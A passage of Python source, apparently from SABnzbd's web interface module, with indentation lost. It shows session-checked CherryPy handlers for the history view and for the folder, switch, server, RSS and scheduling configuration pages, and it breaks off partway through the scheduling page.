@secured_expose(check_session_key=True)
def resume_nzo(self, **kwargs):
uid = kwargs.get('uid', '')
NzbQueue.do.resume_multiple_nzo(uid.split(','))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def set_priority(self, **kwargs):
NzbQueue.do.set_priority(kwargs.get('nzo_id'), kwargs.get('priority'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_avg_age(self, **kwargs):
NzbQueue.do.sort_queue('avg_age', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_name(self, **kwargs):
NzbQueue.do.sort_queue('name', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_size(self, **kwargs):
NzbQueue.do.sort_queue('size', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
##############################################################################
class HistoryPage(object):
def __init__(self, root):
self.__root = root
self.__verbose = False
self.__verbose_list = []
self.__failed_only = False
@secured_expose
def index(self, **kwargs):
start = int_conv(kwargs.get('start'))
limit = int_conv(kwargs.get('limit'))
search = kwargs.get('search')
failed_only = kwargs.get('failed_only')
if failed_only is None:
failed_only = self.__failed_only
history = build_header()
history['isverbose'] = self.__verbose
history['failed_only'] = failed_only
history['rating_enable'] = bool(cfg.rating_enable())
postfix = T('B') # : Abbreviation for bytes, as in GB
grand, month, week, day = BPSMeter.do.get_sums()
history['total_size'], history['month_size'], history['week_size'], history['day_size'] = \
to_units(grand, postfix=postfix), to_units(month, postfix=postfix), \
to_units(week, postfix=postfix), to_units(day, postfix=postfix)
history['lines'], history['fetched'], history['noofslots'] = build_history(limit=limit, start=start, verbose=self.__verbose, verbose_list=self.__verbose_list, search=search, failed_only=failed_only)
if search:
history['search'] = escape(search)
else:
history['search'] = ''
history['start'] = int_conv(start)
history['limit'] = int_conv(limit)
history['finish'] = history['start'] + history['limit']
if history['finish'] > history['noofslots']:
history['finish'] = history['noofslots']
if not history['finish']:
history['finish'] = history['fetched']
history['time_format'] = time_format
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'history.tmpl'),
filter=FILTER, searchList=[history], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def purge(self, **kwargs):
history_db = sabnzbd.get_db_connection()
history_db.remove_history()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
job = kwargs.get('job')
del_files = int_conv(kwargs.get('del_files'))
if job:
jobs = job.split(',')
for job in jobs:
del_hist_job(job, del_files=del_files)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def retry_pp(self, **kwargs):
retry_job(kwargs.get('job'), kwargs.get('nzbfile'), kwargs.get('password'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def retry_all(self, **kwargs):
retry_all_jobs()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def purge_failed(self, **kwargs):
del_files = bool(int_conv(kwargs.get('del_files')))
history_db = sabnzbd.get_db_connection()
if del_files:
del_job_files(history_db.get_failed_paths())
history_db.remove_failed()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def reset(self, **kwargs):
# sabnzbd.reset_byte_counter()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def tog_verbose(self, **kwargs):
jobs = kwargs.get('jobs')
if not jobs:
self.__verbose = not self.__verbose
self.__verbose_list = []
else:
if self.__verbose:
self.__verbose = False
else:
jobs = jobs.split(',')
for job in jobs:
if job in self.__verbose_list:
self.__verbose_list.remove(job)
else:
self.__verbose_list.append(job)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def tog_failed_only(self, **kwargs):
self.__failed_only = not self.__failed_only
raise queueRaiser(self.__root, kwargs)
@secured_expose
def scriptlog(self, **kwargs):
""" Duplicate of scriptlog of History, needed for some skins """
# No session key check, due to fixed URLs
name = kwargs.get('name')
if name:
history_db = sabnzbd.get_db_connection()
return ShowString(history_db.get_name(name), history_db.get_script_log(name))
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry(self, **kwargs):
job = kwargs.get('job', '')
url = kwargs.get('url', '').strip()
pp = kwargs.get('pp')
cat = kwargs.get('cat')
script = kwargs.get('script')
if url:
sabnzbd.add_url(url, pp, script, cat, nzbname=kwargs.get('nzbname'))
del_hist_job(job, del_files=True)
raise Raiser(self.__root)
##############################################################################
class ConfigPage(object):
def __init__(self, root):
self.__root = root
self.folders = ConfigFolders('/config/folders/')
self.notify = ConfigNotify('/config/notify/')
self.general = ConfigGeneral('/config/general/')
self.rss = ConfigRss('/config/rss/')
self.scheduling = ConfigScheduling('/config/scheduling/')
self.server = ConfigServer('/config/server/')
self.switches = ConfigSwitches('/config/switches/')
self.categories = ConfigCats('/config/categories/')
self.sorting = ConfigSorting('/config/sorting/')
self.special = ConfigSpecial('/config/special/')
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['configfn'] = config.get_filename()
conf['cmdline'] = sabnzbd.CMDLINE
conf['build'] = sabnzbd.version.__baseline__[:7]
conf['have_unzip'] = bool(sabnzbd.newsunpack.ZIP_COMMAND)
conf['have_7zip'] = bool(sabnzbd.newsunpack.SEVEN_COMMAND)
conf['have_cryptography'] = bool(sabnzbd.HAVE_CRYPTOGRAPHY)
conf['have_yenc'] = HAVE_YENC
conf['have_sabyenc'] = SABYENC_ENABLED
conf['have_mt_par2'] = sabnzbd.newsunpack.PAR2_MT
conf['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
conf['ssl_version'] = ssl.OPENSSL_VERSION
new = {}
for svr in config.get_servers():
new[svr] = {}
conf['servers'] = new
conf['folders'] = NzbQueue.do.scan_jobs(all=False, action=False)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def restart(self, **kwargs):
logging.info('Restart requested by interface')
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={'timeout': 1}).start()
return T(' <br />SABnzbd shutdown finished.<br />Wait for about 5 second and then click the button below.<br /><br /><strong><a href="..">Refresh</a></strong><br />')
@secured_expose(check_session_key=True)
def repair(self, **kwargs):
logging.info('Queue repair requested by interface')
sabnzbd.request_repair()
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={'timeout': 1}).start()
return T(' <br />SABnzbd shutdown finished.<br />Wait for about 5 second and then click the button below.<br /><br /><strong><a href="..">Refresh</a></strong><br />')
##############################################################################
LIST_DIRPAGE = (
'download_dir', 'download_free', 'complete_dir', 'admin_dir',
'nzb_backup_dir', 'dirscan_dir', 'dirscan_speed', 'script_dir',
'email_dir', 'permissions', 'log_dir', 'password_file'
)
class ConfigFolders(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
for kw in LIST_DIRPAGE:
conf[kw] = config.get_config('misc', kw)()
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_folders.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveDirectories(self, **kwargs):
for kw in LIST_DIRPAGE:
value = kwargs.get(kw)
if value is not None:
value = platform_encode(value)
if kw in ('complete_dir', 'dirscan_dir'):
msg = config.get_config('misc', kw).set(value, create=True)
else:
msg = config.get_config('misc', kw).set(value)
if msg:
# return sabnzbd.api.report('json', error=msg)
return badParameterResponse(msg, kwargs.get('ajax'))
sabnzbd.check_incomplete_vs_complete()
config.save_config()
if kwargs.get('ajax'):
return sabnzbd.api.report('json')
else:
raise Raiser(self.__root)
##############################################################################
SWITCH_LIST = \
('par_option', 'top_only', 'direct_unpack', 'enable_meta', 'win_process_prio',
'auto_sort', 'propagation_delay', 'auto_disconnect', 'flat_unpack',
'safe_postproc', 'no_dupes', 'replace_spaces', 'replace_dots',
'ignore_samples', 'pause_on_post_processing', 'nice', 'ionice',
'pre_script', 'pause_on_pwrar', 'sfv_check', 'folder_rename', 'load_balancing',
'quota_size', 'quota_day', 'quota_resume', 'quota_period', 'history_retention',
'pre_check', 'max_art_tries', 'fail_hopeless_jobs', 'enable_all_par',
'enable_recursive', 'no_series_dupes', 'series_propercheck', 'script_can_fail',
'new_nzb_on_failure', 'unwanted_extensions', 'action_on_unwanted_extensions', 'sanitize_safe',
'rating_enable', 'rating_api_key', 'rating_filter_enable',
'rating_filter_abort_audio', 'rating_filter_abort_video', 'rating_filter_abort_encrypted',
'rating_filter_abort_encrypted_confirm', 'rating_filter_abort_spam', 'rating_filter_abort_spam_confirm',
'rating_filter_abort_downvoted', 'rating_filter_abort_keywords',
'rating_filter_pause_audio', 'rating_filter_pause_video', 'rating_filter_pause_encrypted',
'rating_filter_pause_encrypted_confirm', 'rating_filter_pause_spam', 'rating_filter_pause_spam_confirm',
'rating_filter_pause_downvoted', 'rating_filter_pause_keywords'
)
class ConfigSwitches(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
conf['have_nice'] = bool(sabnzbd.newsunpack.NICE_COMMAND)
conf['have_ionice'] = bool(sabnzbd.newsunpack.IONICE_COMMAND)
conf['cleanup_list'] = cfg.cleanup_list.get_string()
for kw in SWITCH_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['unwanted_extensions'] = cfg.unwanted_extensions.get_string()
conf['scripts'] = list_scripts() or ['None']
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_switches.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSwitches(self, **kwargs):
for kw in SWITCH_LIST:
item = config.get_config('misc', kw)
value = platform_encode(kwargs.get(kw))
if kw == 'unwanted_extensions' and value:
value = value.lower().replace('.', '')
msg = item.set(value)
if msg:
return badParameterResponse(msg)
cleanup_list = kwargs.get('cleanup_list')
if cleanup_list and sabnzbd.WIN32:
cleanup_list = cleanup_list.lower()
cfg.cleanup_list.set(cleanup_list)
config.save_config()
raise Raiser(self.__root)
##############################################################################
SPECIAL_BOOL_LIST = \
('start_paused', 'no_penalties', 'fast_fail', 'ignore_wrong_unrar', 'overwrite_files', 'enable_par_cleanup',
'queue_complete_pers', 'api_warnings', 'ampm', 'enable_unrar', 'enable_unzip', 'enable_7zip',
'enable_filejoin', 'enable_tsjoin', 'ignore_unrar_dates', 'debug_log_decoding',
'multipar', 'osx_menu', 'osx_speed', 'win_menu', 'use_pickle', 'allow_incomplete_nzb',
'rss_filenames', 'ipv6_hosting', 'keep_awake', 'empty_postproc', 'html_login', 'wait_for_dfolder',
'max_art_opt', 'warn_empty_nzb', 'enable_bonjour', 'reject_duplicate_files', 'warn_dupl_jobs',
'replace_illegal', 'backup_for_duplicates', 'disable_api_key', 'api_logging',
'ignore_empty_files', 'x_frame_options', 'require_modern_tls'
)
SPECIAL_VALUE_LIST = \
('size_limit', 'folder_max_length', 'fsys_type', 'movie_rename_limit', 'nomedia_marker',
'max_url_retries', 'req_completion_rate', 'wait_ext_drive', 'show_sysload', 'url_base',
'direct_unpack_threads', 'ipv6_servers', 'selftest_host', 'rating_host'
)
SPECIAL_LIST_LIST = ('rss_odd_titles', 'quick_check_ext_ignore', 'host_whitelist')
class ConfigSpecial(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['switches'] = [(kw, config.get_config('misc', kw)(), config.get_config('misc', kw).default()) for kw in SPECIAL_BOOL_LIST]
conf['entries'] = [(kw, config.get_config('misc', kw)(), config.get_config('misc', kw).default()) for kw in SPECIAL_VALUE_LIST]
conf['entries'].extend([(kw, config.get_config('misc', kw).get_string(), config.get_config('misc', kw).default_string()) for kw in SPECIAL_LIST_LIST])
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_special.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSpecial(self, **kwargs):
for kw in SPECIAL_BOOL_LIST + SPECIAL_VALUE_LIST + SPECIAL_LIST_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
config.save_config()
raise Raiser(self.__root)
##############################################################################
GENERAL_LIST = (
'host', 'port', 'username', 'refresh_rate', 'language', 'cache_limit',
'local_ranges', 'inet_exposure', 'enable_https', 'https_port',
'https_cert', 'https_key', 'https_chain', 'enable_https_verification',
'auto_browser', 'check_new_rel'
)
class ConfigGeneral(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
def ListColors(web_dir):
lst = []
web_dir = os.path.join(sabnzbd.DIR_INTERFACES, web_dir)
dd = os.path.abspath(web_dir + '/templates/static/stylesheets/colorschemes')
if (not dd) or (not os.access(dd, os.R_OK)):
return lst
for color in globber(dd):
col = color.replace('.css', '')
lst.append(col)
return lst
def add_color(skin_dir, color):
if skin_dir:
if not color:
try:
color = DEF_SKIN_COLORS[skin_dir.lower()]
except KeyError:
return skin_dir
return '%s - %s' % (skin_dir, color)
else:
return ''
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['configfn'] = config.get_filename()
conf['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
conf['have_cryptography'] = bool(sabnzbd.HAVE_CRYPTOGRAPHY)
wlist = []
interfaces = globber_full(sabnzbd.DIR_INTERFACES)
for k in interfaces:
if k.endswith(DEF_STDCONFIG):
interfaces.remove(k)
continue
# TEMPORARY: Remove when smpl is really depricated
# Do not show smpl unless it's selected one
if k.endswith('smpl') and 'smpl' not in cfg.web_dir():
interfaces.remove(k)
for web in interfaces:
rweb = os.path.basename(web)
if os.access(web + '/' + DEF_MAIN_TMPL, os.R_OK):
cols = ListColors(rweb)
if cols:
for col in cols:
wlist.append(add_color(rweb, col))
else:
wlist.append(rweb)
conf['web_list'] = wlist
conf['web_dir'] = add_color(cfg.web_dir(), cfg.web_color())
conf['password'] = cfg.password.get_stars()
conf['language'] = cfg.language()
lang_list = list_languages()
if len(lang_list) < 2:
lang_list = []
conf['lang_list'] = lang_list
for kw in GENERAL_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['bandwidth_max'] = cfg.bandwidth_max()
conf['bandwidth_perc'] = cfg.bandwidth_perc()
conf['nzb_key'] = cfg.nzb_key()
conf['local_ranges'] = cfg.local_ranges.get_string()
conf['my_lcldata'] = cfg.admin_dir.get_path()
conf['caller_url'] = cherrypy.request.base + cfg.url_base()
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_general.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveGeneral(self, **kwargs):
# Handle general options
for kw in GENERAL_LIST:
item = config.get_config('misc', kw)
value = platform_encode(kwargs.get(kw))
msg = item.set(value)
if msg:
return badParameterResponse(msg)
# Handle special options
cfg.password.set(kwargs.get('password'))
web_dir = kwargs.get('web_dir')
change_web_dir(web_dir)
bandwidth_max = kwargs.get('bandwidth_max')
if bandwidth_max is not None:
cfg.bandwidth_max.set(bandwidth_max)
bandwidth_perc = kwargs.get('bandwidth_perc')
if bandwidth_perc is not None:
cfg.bandwidth_perc.set(bandwidth_perc)
bandwidth_perc = cfg.bandwidth_perc()
if bandwidth_perc and not bandwidth_max:
logging.warning(T('You must set a maximum bandwidth before you can set a bandwidth limit'))
config.save_config()
# Update CherryPy authentication
set_auth(cherrypy.config)
if kwargs.get('ajax'):
return sabnzbd.api.report('json', data={'success': True, 'restart_req': sabnzbd.RESTART_REQ})
else:
raise Raiser(self.__root)
def change_web_dir(web_dir):
try:
web_dir, web_color = web_dir.split(' - ')
except:
try:
web_color = DEF_SKIN_COLORS[web_dir.lower()]
except:
web_color = ''
web_dir_path = real_path(sabnzbd.DIR_INTERFACES, web_dir)
if not os.path.exists(web_dir_path):
return badParameterResponse('Cannot find web template: %s' % unicoder(web_dir_path))
else:
cfg.web_dir.set(web_dir)
cfg.web_color.set(web_color)
##############################################################################
class ConfigServer(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
new = []
servers = config.get_servers()
server_names = sorted(servers.keys(), key=lambda svr: '%d%02d%s' % (int(not servers[svr].enable()), servers[svr].priority(), servers[svr].displayname().lower()))
for svr in server_names:
new.append(servers[svr].get_dict(safe=True))
t, m, w, d, timeline = BPSMeter.do.amounts(svr)
if t:
new[-1]['amounts'] = to_units(t), to_units(m), to_units(w), to_units(d), timeline
conf['servers'] = new
conf['cats'] = list_cats(default=True)
conf['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_server.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def addServer(self, **kwargs):
return handle_server(kwargs, self.__root, True)
@secured_expose(check_session_key=True, check_configlock=True)
def saveServer(self, **kwargs):
return handle_server(kwargs, self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def testServer(self, **kwargs):
return handle_server_test(kwargs, self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def delServer(self, **kwargs):
kwargs['section'] = 'servers'
kwargs['keyword'] = kwargs.get('server')
del_from_section(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def clrServer(self, **kwargs):
server = kwargs.get('server')
if server:
BPSMeter.do.clear_server(server)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def toggleServer(self, **kwargs):
server = kwargs.get('server')
if server:
svr = config.get_config('servers', server)
if svr:
svr.enable.set(not svr.enable())
config.save_config()
Downloader.do.update_server(server, server)
raise Raiser(self.__root)
def unique_svr_name(server):
""" Return a unique variant on given server name """
num = 0
svr = 1
new_name = server
while svr:
if num:
new_name = '%s@%d' % (server, num)
else:
new_name = '%s' % server
svr = config.get_config('servers', new_name)
num += 1
return new_name
def check_server(host, port, ajax):
""" Check if server address resolves properly """
if host.lower() == 'localhost' and sabnzbd.AMBI_LOCALHOST:
return badParameterResponse(T('Warning: LOCALHOST is ambiguous, use numerical IP-address.'), ajax)
if GetServerParms(host, int_conv(port)):
return ""
else:
return badParameterResponse(T('Server address "%s:%s" is not valid.') % (host, port), ajax)
def handle_server(kwargs, root=None, new_svr=False):
""" Internal server handler """
ajax = kwargs.get('ajax')
host = kwargs.get('host', '').strip()
if not host:
return badParameterResponse(T('Server address required'), ajax)
port = kwargs.get('port', '').strip()
if not port:
if not kwargs.get('ssl', '').strip():
port = '119'
else:
port = '563'
kwargs['port'] = port
if kwargs.get('connections', '').strip() == '':
kwargs['connections'] = '1'
if kwargs.get('enable') == '1':
msg = check_server(host, port, ajax)
if msg:
return msg
# Default server name is just the host name
server = host
svr = None
old_server = kwargs.get('server')
if old_server:
svr = config.get_config('servers', old_server)
if svr:
server = old_server
else:
svr = config.get_config('servers', server)
if new_svr:
server = unique_svr_name(server)
for kw in ('ssl', 'send_group', 'enable', 'optional'):
if kw not in kwargs.keys():
kwargs[kw] = None
if svr and not new_svr:
svr.set_dict(kwargs)
else:
old_server = None
config.ConfigServer(server, kwargs)
config.save_config()
Downloader.do.update_server(old_server, server)
if root:
if ajax:
return sabnzbd.api.report('json')
else:
raise Raiser(root)
def handle_server_test(kwargs, root):
_result, msg = test_nntp_server_dict(kwargs)
return msg
##############################################################################
class ConfigRss(object):
def __init__(self, root):
self.__root = root
self.__refresh_readout = None # Set to URL when new readout is needed
self.__refresh_download = False # True when feed needs to be read
self.__refresh_force = False # True if forced download of all matches is required
self.__refresh_ignore = False # True if first batch of new feed must be ignored
self.__evaluate = False # True if feed needs to be re-filtered
self.__show_eval_button = False # True if the "Apply filers" button should be shown
self.__last_msg = '' # Last error message from RSS reader
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['scripts'] = list_scripts(default=True)
pick_script = conf['scripts'] != []
conf['categories'] = list_cats(default=True)
pick_cat = conf['categories'] != []
conf['rss_rate'] = cfg.rss_rate()
rss = {}
feeds = config.get_rss()
for feed in feeds:
rss[feed] = feeds[feed].get_dict()
filters = feeds[feed].filters()
rss[feed]['filters'] = filters
rss[feed]['filter_states'] = [bool(sabnzbd.rss.convert_filter(f[4])) for f in filters]
rss[feed]['filtercount'] = len(filters)
rss[feed]['pick_cat'] = pick_cat
rss[feed]['pick_script'] = pick_script
rss[feed]['link'] = urllib.quote_plus(feed.encode('utf-8'))
rss[feed]['baselink'] = [get_base_url(uri) for uri in rss[feed]['uri']]
rss[feed]['uris'] = feeds[feed].uri.get_string()
active_feed = kwargs.get('feed', '')
conf['active_feed'] = active_feed
conf['rss'] = rss
conf['rss_next'] = time.strftime(time_format('%H:%M'), time.localtime(sabnzbd.rss.next_run())).decode(codepage)
if active_feed:
readout = bool(self.__refresh_readout)
logging.debug('RSS READOUT = %s', readout)
if not readout:
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = False
if self.__evaluate:
msg = sabnzbd.rss.run_feed(active_feed, download=self.__refresh_download, force=self.__refresh_force,
ignoreFirst=self.__refresh_ignore, readout=readout)
else:
msg = ''
self.__evaluate = False
if readout:
sabnzbd.rss.save()
self.__last_msg = msg
else:
msg = self.__last_msg
self.__refresh_readout = None
conf['evalButton'] = self.__show_eval_button
conf['error'] = msg
conf['downloaded'], conf['matched'], conf['unmatched'] = GetRssLog(active_feed)
else:
self.__last_msg = ''
# Find a unique new Feed name
unum = 1
txt = T('Feed') # : Used as default Feed name in Config->RSS
while txt + str(unum) in feeds:
unum += 1
conf['feed'] = txt + str(unum)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_rss.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def save_rss_rate(self, **kwargs):
""" Save changed RSS automatic readout rate """
cfg.rss_rate.set(kwargs.get('rss_rate'))
config.save_config()
scheduler.restart()
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def upd_rss_feed(self, **kwargs):
""" Update Feed level attributes,
legacy version: ignores 'enable' parameter
"""
if kwargs.get('enable') is not None:
del kwargs['enable']
try:
cf = config.get_rss()[kwargs.get('feed')]
except KeyError:
cf = None
uri = Strip(kwargs.get('uri'))
if cf and uri:
kwargs['uri'] = uri
cf.set_dict(kwargs)
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def save_rss_feed(self, **kwargs):
""" Update Feed level attributes """
try:
cf = config.get_rss()[kwargs.get('feed')]
except KeyError:
cf = None
if 'enable' not in kwargs:
kwargs['enable'] = 0
uri = Strip(kwargs.get('uri'))
if cf and uri:
kwargs['uri'] = uri
cf.set_dict(kwargs)
config.save_config()
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def toggle_rss_feed(self, **kwargs):
""" Toggle automatic read-out flag of Feed """
try:
item = config.get_rss()[kwargs.get('feed')]
except KeyError:
item = None
if cfg:
item.enable.set(not item.enable())
config.save_config()
if kwargs.get('table'):
raise Raiser(self.__root)
else:
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def add_rss_feed(self, **kwargs):
""" Add one new RSS feed definition """
feed = Strip(kwargs.get('feed')).strip('[]')
uri = Strip(kwargs.get('uri'))
if feed and uri:
try:
cfg = config.get_rss()[feed]
except KeyError:
cfg = None
if (not cfg) and uri:
kwargs['feed'] = feed
kwargs['uri'] = uri
config.ConfigRSS(feed, kwargs)
# Clear out any existing reference to this feed name
# Otherwise first-run detection can fail
sabnzbd.rss.clear_feed(feed)
config.save_config()
self.__refresh_readout = feed
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = True
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
else:
raise Raiser(self.__root)
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def upd_rss_filter(self, **kwargs):
""" Wrapper, so we can call from api.py """
self.internal_upd_rss_filter(**kwargs)
def internal_upd_rss_filter(self, **kwargs):
""" Save updated filter definition """
try:
feed_cfg = config.get_rss()[kwargs.get('feed')]
except KeyError:
raise rssRaiser(self.__root, kwargs)
pp = kwargs.get('pp')
if IsNone(pp):
pp = ''
script = ConvertSpecials(kwargs.get('script'))
cat = ConvertSpecials(kwargs.get('cat'))
prio = ConvertSpecials(kwargs.get('priority'))
filt = kwargs.get('filter_text')
enabled = kwargs.get('enabled', '0')
if filt:
feed_cfg.filters.update(int(kwargs.get('index', 0)), (cat, pp, script, kwargs.get('filter_type'),
platform_encode(filt), prio, enabled))
# Move filter if requested
index = int_conv(kwargs.get('index', ''))
new_index = kwargs.get('new_index', '')
if new_index and int_conv(new_index) != index:
feed_cfg.filters.move(int(index), int_conv(new_index))
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def del_rss_feed(self, *args, **kwargs):
""" Remove complete RSS feed """
kwargs['section'] = 'rss'
kwargs['keyword'] = kwargs.get('feed')
del_from_section(kwargs)
sabnzbd.rss.clear_feed(kwargs.get('feed'))
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def del_rss_filter(self, **kwargs):
""" Wrapper, so we can call from api.py """
self.internal_del_rss_filter(**kwargs)
def internal_del_rss_filter(self, **kwargs):
""" Remove one RSS filter """
try:
feed_cfg = config.get_rss()[kwargs.get('feed')]
except KeyError:
raise rssRaiser(self.__root, kwargs)
feed_cfg.filters.delete(int(kwargs.get('index', 0)))
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def download_rss_feed(self, *args, **kwargs):
""" Force download of all matching jobs in a feed """
if 'feed' in kwargs:
feed = kwargs['feed']
self.__refresh_readout = feed
self.__refresh_download = True
self.__refresh_force = True
self.__refresh_ignore = False
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def clean_rss_jobs(self, *args, **kwargs):
""" Remove processed RSS jobs from UI """
sabnzbd.rss.clear_downloaded(kwargs['feed'])
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def test_rss_feed(self, *args, **kwargs):
""" Read the feed content again and show results """
if 'feed' in kwargs:
feed = kwargs['feed']
self.__refresh_readout = feed
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = True
self.__evaluate = True
self.__show_eval_button = False
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def eval_rss_feed(self, *args, **kwargs):
""" Re-apply the filters to the feed """
if 'feed' in kwargs:
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = False
self.__show_eval_button = False
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def download(self, **kwargs):
""" Download NZB from provider (Download button) """
feed = kwargs.get('feed')
url = kwargs.get('url')
nzbname = kwargs.get('nzbname')
att = sabnzbd.rss.lookup_url(feed, url)
if att:
pp = att.get('pp')
cat = att.get('cat')
script = att.get('script')
prio = att.get('prio')
if url:
sabnzbd.add_url(url, pp, script, cat, prio, nzbname)
# Need to pass the title instead
sabnzbd.rss.flag_downloaded(feed, url)
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def rss_now(self, *args, **kwargs):
""" Run an automatic RSS run now """
scheduler.force_rss()
raise rssRaiser(self.__root, kwargs)
def ConvertSpecials(p):
""" Convert None to 'None' and 'Default' to '' """
if p is None:
p = 'None'
elif p.lower() == T('Default').lower():
p = ''
return p
def IsNone(value):
""" Return True if either None, 'None' or '' """
return value is None or value == "" or value.lower() == 'none'
def Strip(txt):
""" Return stripped string, can handle None """
try:
return txt.strip()
except:
return None
##############################################################################
_SCHED_ACTIONS = ('resume', 'pause', 'pause_all', 'shutdown', 'restart', 'speedlimit',
'pause_post', 'resume_post', 'scan_folder', 'rss_scan', 'remove_failed',
'remove_completed', 'pause_all_low', 'pause_all_normal', 'pause_all_high',
'resume_all_low', 'resume_all_normal', 'resume_all_high',
'enable_quota', 'disable_quota'
)
class ConfigScheduling(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
def get_days():
days = {"*": T('Daily'), "1": T('Monday'), "2": T('Tuesday'), "3": T('Wednesday'), "4": T('Thursday'),
"5": T('Friday'), "6": T('Saturday'), "7": T('Sunday')}
return days
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
actions = []
actions.extend(_SCHED_ACTIONS)
day_names = get_days()
categories = list_cats(False)
snum = 1
conf['schedlines'] = []
conf['taskinfo'] = []
for ev in scheduler.sort_schedules(all_events=False):
line = ev[3]
conf['schedlines'].append(line)
try:
